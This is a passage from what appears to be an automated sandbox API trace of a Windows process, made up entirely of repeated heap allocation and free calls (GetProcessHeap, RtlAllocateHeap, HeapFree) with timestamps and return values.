(HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.016] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.017] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.018] GetProcessHeap () returned 0x4f10000 [0061.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.019] GetProcessHeap () returned 0x4f10000 [0061.019] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.020] GetProcessHeap () returned 0x4f10000 [0061.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.021] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.021] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.022] GetProcessHeap () returned 0x4f10000 [0061.022] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.023] GetProcessHeap () returned 0x4f10000 [0061.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f708d8 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f708d8 | out: hHeap=0x4f10000) returned 1 [0061.024] GetProcessHeap () returned 0x4f10000 [0061.024] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 